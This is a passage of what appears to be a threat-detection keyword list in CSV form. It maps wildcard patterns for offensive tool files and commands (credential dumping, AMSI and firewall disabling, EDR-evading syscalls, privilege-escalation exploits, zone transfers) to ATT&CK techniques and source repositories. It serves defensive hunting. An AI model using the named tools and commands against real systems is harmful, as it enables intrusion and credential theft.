- TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Wh04m1001/DFSCoerce,1,1,N/A,10,7,635,78,2022-09-09T17:45:41Z,2022-06-18T12:38:37Z -*dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*dhadilbmmjiooceioladdphemaliiobo*,greyware_tool_keyword,Free Proxy VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*dhcp6.spoof.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*Dialupass.exe*,offensive_tool_keyword,dialupass,This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/dialupass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Dialupass.zip*,offensive_tool_keyword,dialupass,This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/dialupass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dicts*generic-usernames.txt*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*dicts/ftp_pswd.txt*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*dicts/ssh_default.txt*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*dicts/ssh_pswd.txt*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*diego-treitos/linux-smart-enumeration*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*dig * axfr *@*,greyware_tool_keyword,dig,dig,T1018,TA0007,N/A,N/A,Reconnaissance,https://linux.die.net/man/1/dig,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dig *@* axfr*,greyware_tool_keyword,dig,classic DNS Zone transfer request. The idea behind it is to attempt to duplicate all the DNS records for a given zone (or domain). This is a technique often used by attackers to gather information about the infrastructure of a target organization.,T1018,TA0007,N/A,N/A,Reconnaissance,https://linux.die.net/man/1/dig,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dig axfr * @*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dinjector /i:* /p:*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*DInjector.csproj*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*DInjector.Detonator*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*DInjector.dll*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*DInjector/Dinjector*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*Dinjector-main*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*Dionach*PassHunt*,offensive_tool_keyword,PassHunt,PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.,T1081 - T1083 - T1003 - T1039 - T1213,TA0003 - TA0010,N/A,N/A,Information Gathering,https://github.com/Dionach/PassHunt,1,1,N/A,N/A,1,60,36,2014-07-11T09:08:02Z,2014-07-11T08:46:20Z -*dir /a C:\pagefile.sys | findstr /R *,greyware_tool_keyword,find,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*dir C:\Users\*\AppData\Local\Microsoft\Credentials*,offensive_tool_keyword,dir,Find the IDs of protected secrets for a specific user,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dir_create2system.txt*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*dirb *http* /usr/share/seclists/Discovery/Web-Content/big.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dirb/wordlists*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dircreate2system.cpp*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*dircreate2system.exe*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*dircreate2system.sln*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*dircreate2system.vcxproj*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*DirCreate2System-main*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*Direct_Syscalls_Create_Thread.c*,offensive_tool_keyword,Direct-Syscalls,Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*Direct_Syscalls_Create_Thread.exe*,offensive_tool_keyword,Direct-Syscalls,Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*Direct_Syscalls_Create_Thread.sln*,offensive_tool_keyword,Direct-Syscalls,Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*Direct_Syscalls_Create_Thread.vcxproj*,offensive_tool_keyword,Direct-Syscalls,Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*DirectDLL_x64.dll*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DirectDLL_x86.dll*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Directory-Traversal-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*Direct-Syscalls-vs-Indirect-Syscalls.git*,offensive_tool_keyword,Indirect-Syscalls,Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*dirkjan@sanoweb.nl*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*dirkjanm/ldapdomaindump*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dirkjanm/PKINITtools*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dirkjanm/PrivExchange*,offensive_tool_keyword,privexchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1053.005 - T1078 - T1069.002,TA0002 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*dirscanner.py*,offensive_tool_keyword,RedTeam_toolkit,Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signorrayan/RedTeam_toolkit,1,1,N/A,N/A,5,499,114,2023-09-27T04:40:54Z,2021-08-18T08:58:14Z -*dirscraper*,offensive_tool_keyword,dirscraper,Dirscraper is an OSINT scanning tool which assists penetration testers in identifying hidden. or previously unknown. directories on a domain or subdomain. This helps greatly in the recon stage of pentesting as it provide pentesters with a larger attack surface for the specific domain.,T1596 - T1530 - T1201,TA0040 - ,N/A,N/A,Information Gathering,https://github.com/Cillian-Collins/dirscraper,1,1,N/A,N/A,3,212,34,2019-02-24T12:22:47Z,2019-02-21T23:06:58Z -*dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dirsearch*,offensive_tool_keyword,dirsearch,Dirsearch is a mature command-line tool designed to brute force directories and files in webservers.,T1110 - T1114 - T1100 - T1313,TA0001 - TA0007,N/A,N/A,Web Attacks,https://github.com/maurosoria/dirsearch,1,0,N/A,N/A,10,10324,2209,2023-10-03T11:22:52Z,2013-04-30T15:57:40Z -*dirTraversal.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*dirTraversal-nix.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*dirTraversal-win.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*dirty_sock*,offensive_tool_keyword,POC,dirty_sock: Linux Privilege Escalation (via snapd) In January 2019. current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC,T1210 - T1211 - T1212 - T1547,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/initstring/dirty_sock,1,1,N/A,N/A,7,640,159,2019-05-09T21:34:26Z,2019-02-12T06:02:06Z -*dirty_sock/archive/master.zip*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*dirtycow*,offensive_tool_keyword,dirtycow,Linux vulnerability name to go root CVE-2016-5195) Dirty COW est une vulnrabilit de scurit du noyau Linux qui affecte tous les systmes d'exploitation Linux. y compris Android. C'est un dfaut d'lvation de privilge qui exploite une condition de concurrence dans la mise en uvre de la copie sur criture dans le noyau de gestion de la mmoire,T1068 - T1055 - T1574.002,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,multiple pocs on github and others places ,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Dirty-Pipe/exploit-static*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/carlosevieira/Dirty-Pipe,1,1,N/A,N/A,1,8,5,2022-03-07T21:01:15Z,2022-03-07T20:57:34Z -*dirtypipe-exploit/blob/main/dirtypipe.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit,1,1,N/A,N/A,,N/A,,, -*-DirtyPipe-Exploits*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits,1,1,N/A,N/A,5,453,129,2023-05-20T05:55:45Z,2022-03-12T20:57:24Z -*dirwalk.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*disable_clamav.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*disable_clamav.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Disable_Privilege /Process:* /Privilege:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*DisableAllWindowsSoftwareFirewalls*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,1,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -*DisableAMSI(*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*DisableAntiPhishing*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*DisableAntiPhishing.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*disableeventvwr/*.ps1*,offensive_tool_keyword,cobaltstrike,Aggressor script to integrate Phant0m with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/p292/Phant0m_cobaltstrike,1,1,N/A,10,10,26,13,2017-06-08T06:42:18Z,2017-06-08T06:39:07Z -*DisableKerberosSigning*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - 